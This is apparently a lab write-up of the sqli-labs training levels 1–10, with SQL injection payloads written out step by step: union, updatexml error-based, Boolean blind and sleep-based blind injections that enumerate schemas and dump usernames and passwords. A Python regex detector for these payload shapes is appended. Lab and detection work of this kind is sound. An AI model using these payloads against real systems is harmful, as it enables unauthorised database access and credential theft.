SQL lab 1~10 summary (subsequent continuous update)
2022-07-07 12:23:00 【hcjtn】
General process of SQL injection:
(Levels 1~6)
Determine the injection point
- When id=1 and 1=2 -- q makes the page behave abnormally, SQL injection probably exists.
- If the page reports the input as illegal, try other injection forms.
Determine the number of fields
- order by (sorts the results by the specified column): if the given number exceeds the number of columns, an error is reported, so this behaviour can be used to determine the column count.
Determine the echo point (the column whose value is displayed on the page)
- e.g. union select 1,2,3: if the page shows 2, the echo point is column 2.
- Note: the id value must be set to a nonexistent value, so that the original query returns no row and the rows from the UNION's second SELECT land in the first position of the result array; only with a nonexistent id do we see the real data.
Retrieve the relevant content
Determine the database name
?id=-1' union select 1,database(),3 -- q (obvious displacement of the page output)
Use updatexml error-based injection (no obvious displacement)
Syntax:
updatexml(target XML content, XML document path (XPath), replacement content)
updatexml(1,concat(0x7e,(select database()),0x7e),1) (0x7e is "~", a character that is not valid in the XPath argument; this makes the function raise an error whose message contains the library name we want)
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- q
Determine the table names
?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 1,1-- q
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- q
group_concat drawback: it joins all results into one string, which may be truncated and leave the answer incomplete.
- limit restricts which row is returned, and therefore which name is echoed.
- ?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) -- q (no obvious displacement)
Determine the column names
?id=-1' union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails' -- q
?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- q (no obvious displacement)
URL-encoded form (double-quote variant):
?id=1"%20and%20updatexml(1,concat(0x7e,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%200,1),0x7e),1)--%20q
Determine the data:
?id=-1' union select 1,id,3 from emails -- q
?id=1' and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q
Extract the data: ?id=-1' union select 1,group_concat(concat_ws('~',username,password)),3 from users -- q
(Levels 7~10)
Unlike the first four levels, levels 5 to 8 do not echo the queried information to the page (levels 5 and 6 do display errors when a malformed statement is entered, but level 8 does not), so blind injection is needed (or error-based injection, described above).
- Boolean-based blind injection
- length(): returns the length of a string
- substr(): extracts part of a string (syntax: substr(str,pos,len))
- ascii(): returns the character's ASCII code (turns a character into a number)
- Time-based blind injection
- sleep(n): pauses execution for n seconds
- if(expr1,expr2,expr3): conditional; if expr1 is true, expr2 is evaluated, otherwise expr3.
- Boolean-based blind injection, step by step (using sqli-labs less-8 as the example):
Get the length of the database name: ?id=1' and (length(database()))=8-- q (use >, < or = to narrow down the length of the database name)
Get the database name:
?id=1' and ascii(substr(database(),1,1))=115-- q takes one character of the database name starting at position 1 (you get a decimal number; convert it to a letter or symbol with the ASCII table). The first character is s.
This can also be done with Burp Suite.
Get the number of tables: ?id=1' and (select count(*) from information_schema.tables where table_schema='security')>5-- q (ends at =4)
Get the length of the table name: ?id=1' and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)>5-- q (ends at =6): the length is 6
Get the name of the table: ?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101-- q The first character is e
Get the field name: ?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)))=105-- q The first character is i
- Time-based blind injection, step by step (using sqli-labs less-9 as the example):
With the Boolean blind technique just used, level 9 returns the same page no matter what condition is entered, which proves that Boolean blind injection cannot be used here; so try time-based blind injection.
Find the length of the database name: ?id=1' and if(length(database())=8,sleep(5),1)-- q (if the condition holds, the response arrives after five seconds; note: the trailing 1 has no special meaning)
Find the database name: ?id=1' and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first character is s
Find the table name: ?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q The first character is e
Find the field name: ?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q The first character is i
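Added defender's example (not from the original post): a small Python access-log classifier that tags the request shapes used in both parts of this write-up (union, updatexml error-based, Boolean and time-based blind, and information_schema enumeration). The log lines are constructed to mirror the payloads above; the client IP and the Less-N paths are placeholders.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signature families for the payload shapes walked through in this write-up.
# Each regex runs on the URL-decoded, lower-cased, whitespace-collapsed parameter value.
FAMILIES = {
    "union": re.compile(r"\bunion\b\s*(?:all\s+)?select\b"),
    "error": re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
    "boolean": re.compile(r"\bascii\s*\(\s*substr|\blength\s*\(|\bcount\s*\(\s*\*\s*\)"),
    "time": re.compile(r"\bsleep\s*\("),
}
SCHEMA_PROBE = re.compile(r"\binformation_schema\.")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalize(value):
    """Lower-case and collapse whitespace; parse_qsl has already percent-decoded the value."""
    return " ".join(value.lower().split())

def classify(url):
    """Return the set of signature families found in any query parameter of `url`."""
    tags = set()
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        v = normalize(value)
        tags.update(name for name, pat in FAMILIES.items() if pat.search(v))
        if SCHEMA_PROBE.search(v):
            tags.add("schema_enum")
    return tags

def scan_log(text):
    """Return (line_no, url, sorted families) for every request line that matches a signature."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_LINE.search(line)
        if m:
            tags = classify(m.group(1))
            if tags:
                hits.append((n, m.group(1), sorted(tags)))
    return hits

# Constructed access-log sample (not from the original post); IP and paths are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jul/2022:12:23:00 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 721
203.0.113.5 - - [07/Jul/2022:12:23:04 +0800] "GET /Less-1/?id=-1'%20union%20select%201,database(),3--%20q HTTP/1.1" 200 734
203.0.113.5 - - [07/Jul/2022:12:23:09 +0800] "GET /Less-1/?id=1'%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema='security'%20limit%200,1),0x7e),1)--%20q HTTP/1.1" 200 698
203.0.113.5 - - [07/Jul/2022:12:23:15 +0800] "GET /Less-8/?id=1'%20and%20ascii(substr(database(),1,1))=115--%20q HTTP/1.1" 200 702
203.0.113.5 - - [07/Jul/2022:12:23:31 +0800] "GET /Less-9/?id=1'%20and%20if(length(database())=8,sleep(5),1)--%20q HTTP/1.1" 200 702
"""

if __name__ == "__main__":
    for n, url, tags in scan_log(SAMPLE_LOG):
        print(f"line {n}: {tags} <- {url}")
```

Note that the time-based probe also trips the Boolean family because it embeds length(), which is exactly the overlap a triage analyst should expect between the two blind techniques.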